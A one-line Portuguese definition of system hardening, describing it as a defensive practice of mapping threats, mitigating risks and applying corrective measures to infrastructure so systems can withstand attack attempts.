  • Hardening é uma técnica de blindagem de sistemas que envolve um processo de mapeamento das ameaças, mitigação dos riscos e execução das atividades corretivas com foco na infra estrutura. Seu objetivo principal é tornar o sistema preparado para enfrentar tentativas de ataque.